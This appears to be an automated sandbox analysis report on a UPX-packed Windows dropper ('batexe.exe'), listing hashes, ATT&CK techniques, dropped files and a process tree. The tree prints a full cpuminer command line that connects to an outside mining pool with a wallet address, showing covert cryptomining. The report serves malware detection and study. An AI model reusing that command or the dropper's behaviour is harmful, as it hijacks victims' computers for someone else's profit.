73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
303s
max time network
312s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17/02/2024, 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3988	b2e.exe
2908	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
2908	cpuminer-sse2.exe
2908	cpuminer-sse2.exe
2908	cpuminer-sse2.exe
2908	cpuminer-sse2.exe
2908	cpuminer-sse2.exe
2908	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1388-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 3988	1388	batexe.exe	85
PID 1388 wrote to memory of 3988	1388	batexe.exe	85
PID 1388 wrote to memory of 3988	1388	batexe.exe	85
PID 3988 wrote to memory of 2960	3988	b2e.exe	86
PID 3988 wrote to memory of 2960	3988	b2e.exe	86
PID 3988 wrote to memory of 2960	3988	b2e.exe	86
PID 2960 wrote to memory of 2908	2960	cmd.exe	89
PID 2960 wrote to memory of 2908	2960	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Users\Admin\AppData\Local\Temp\97D6.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\97D6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\97D6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A66C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\97D6.tmp\b2e.exe

Filesize
3.9MB

MD5
cd77771e29054f14a33953c682bc5d56

SHA1
a0dc818676727e4d3fea6f6c681c700673383327

SHA256
d7711ba67422eef0e942b3e15da41d04d3733a8e6e8d4a48872adeb189bc1577

SHA512
603eba5f5625eeea0f4063b09dc2efeafe0d5b03287426297fd54ad08ccf032b87f57109174f6c4a535f8466e243e6dfe541ca7765095bce31f5f6be2e4b888a

Download Submit
C:\Users\Admin\AppData\Local\Temp\97D6.tmp\b2e.exe

Filesize
2.2MB

MD5
8bfb74a8b2d954abb550a5ced2547f39

SHA1
5df3ac9501e9cf416b3f6abd0fb62dcba1bdc595

SHA256
f80a05c4b88bdec2ea9167e5538117535347fd7a877728e586d1aa655f7a25fc

SHA512
97c76371cee48076412676c829a031467ac1f5151b8f17d3112418f47881b6188aac81861caba765e378f054b6e8f56793041b7b78a318cbd7ce10d6d3b832b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\97D6.tmp\b2e.exe

Filesize
2.5MB

MD5
e386f741709e8804b9a07b4d2e43fbd2

SHA1
79eed9171d17afc94ab27b86a4132fdb84aff714

SHA256
edf3e03cfd130860bcdd5ea84d45cbc1cbdfe64f45683c93ff94daef1b4aff61

SHA512
61f6ab91c663f3eaf16057ddfafeefe0c4b064544b90c3806cd94461a448af1a928be688f86ea34ecd89c03ead3f80c666842f9026c08ad5ed77133bb5d4ee02

Download Submit
C:\Users\Admin\AppData\Local\Temp\A66C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
868KB

MD5
448519da2e2ed7092dcedb6dcb8508ba

SHA1
aa66e4496e19268626cc6b985f17be108d1c5f01

SHA256
ec5bded6d749bcdf77696d7001754cd1558cd6ceb8904041f3d463c8962627de

SHA512
003c14bf7912f7e7e2ccc89f5db6d4f88d7d1ffdf521d742611bfb0ec4a28ee0e737786e3a15a1c3b39d2c4f4741ffabe08142916c1a3673e7a86c8abf81867c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
921KB

MD5
43ebbb3e1316de730e9962520f53497d

SHA1
b0f2025d4fdb2792164362cba519e2a9ed7bfb64

SHA256
22f47315cfa9181c69220567a2372a6356586408544a0014505e1baf5dfad277

SHA512
bf413e83dc94e429dccecbdec8630c915d8d26b88fead4baa01e0fcb7ed8451669328b87384e1474e36508ebe0fceaf127dddd358c9aff7385ed7eea29684a78

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
626KB

MD5
a9d385a8117b65f95abeedf8d3977e72

SHA1
b3eeee7001b5d348bee97c3b40e2251d36d58d33

SHA256
af91ecbdd2b3ee5eee8966412f04cf9dc1160ba26ab893bc50a8cbb73cd29667

SHA512
550fc55fd1aa12a705de7d3d2cee5432db99bac3dace97ddb38603a9f398e3c06b70771a39c102a6be571d29bc99d160bde0b9a4ae0674ff72c0929740a414e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
424KB

MD5
804b89ad1f9704fc92f322135a829959

SHA1
8aac6eb6aa961b0dcfe7cae947416be9180c640a

SHA256
888dceba5f717a68efb07c24fa9add890ceb372e7f7e8d4489862d784a1bd6b9

SHA512
add8f84097e73381cbf8dbb5afe84685ebdcd1c84cc0d01d27e2c845a67f51cb0c632ff38fca2ba7e8ae478b1ee3c76ca8aea8220c71ca26f5e794ae33ebb762

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
927KB

MD5
f0d9cb19cc32267b3914b2731dfe46e1

SHA1
075ed9d1083fe75da8b5b8831954c6342be9e420

SHA256
64f2312dc802ccdf8fccb9a258f1665d82da262a36bb3b9014283c929b6819da

SHA512
d609018eeaf2b9fe0addfe704ff6d4bcd8c5307185e170427050fdfdaff83eaaf44a226884be5f8a956616b488b6b5c8231e78733fa5897b4bfcb38e20de4681

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
575KB

MD5
2a7b403a2fb3c1404d5c0eb0940c5d07

SHA1
55ba73e22c47e84dafb0c6e59450091ae7efcbff

SHA256
78370253a78684eb4de9040bc189ff915d039d0535316699651b1569b3c599aa

SHA512
e98c24183467628852db3a81d22e4baae971bb672f13d9c1489746e5a00ad04b9f2bc499d88cf6b7aa8ad021313dc853e43e1b31778e3a90b4aa1198357e20b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
743KB

MD5
b1851d8b92db500a712aded8cc807d81

SHA1
54ec1396172339fb43fb374acf333d2a7c0c0091

SHA256
42f6f153d166a3945b232c66ddfbd7abd68b0ba99c03cdbe6b6320cee3c540b5

SHA512
aab46e2ba287ed3fe2b5f139f4c881054f5fbd25925300b54eb3c72751061ec1c27301f324b0394e52e029eb50cbe531a5d59196ca61d944188684a09285d098

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
d270a9f7af53d27af1474b948ef14fb6

SHA1
7eb2dd8d32114bc08e94f70ca0d504c6d7cc7e21

SHA256
4d78c508842b759b8634e43897576187389d253e2f6663d3f18944e1ed7afce1

SHA512
73466239b98922c558657875877224ff9fe745729a79557dcf15eb38a75075e6ecd730ad756af712a6a5ab6aa09140e5388b6fe1dfcd03212e92a6c7b882d5b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
977KB

MD5
f3136c774c26b9da253c7631892f5573

SHA1
ba8e769f31cd31b2cfcad24eafa6d920b15e7f96

SHA256
1cdcf997681a9be6bc18a3c7fa1a5ed0a4f377d0980e669b64b7e7b3743c62ed

SHA512
4c419afb0fffe3a2bbffc91ce7aba9ec19c6898047e385a4822392f33d6316e9bf035121baaf281b30dbb086d98e010e80ad2d39acbc3bc684b7cf95f372a097

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1388-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2908-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-48-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/2908-49-0x000000006F190000-0x000000006F228000-memory.dmp

Filesize
608KB

Download
memory/2908-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2908-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/2908-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-52-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2908-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-42-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/2908-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3988-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3988-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download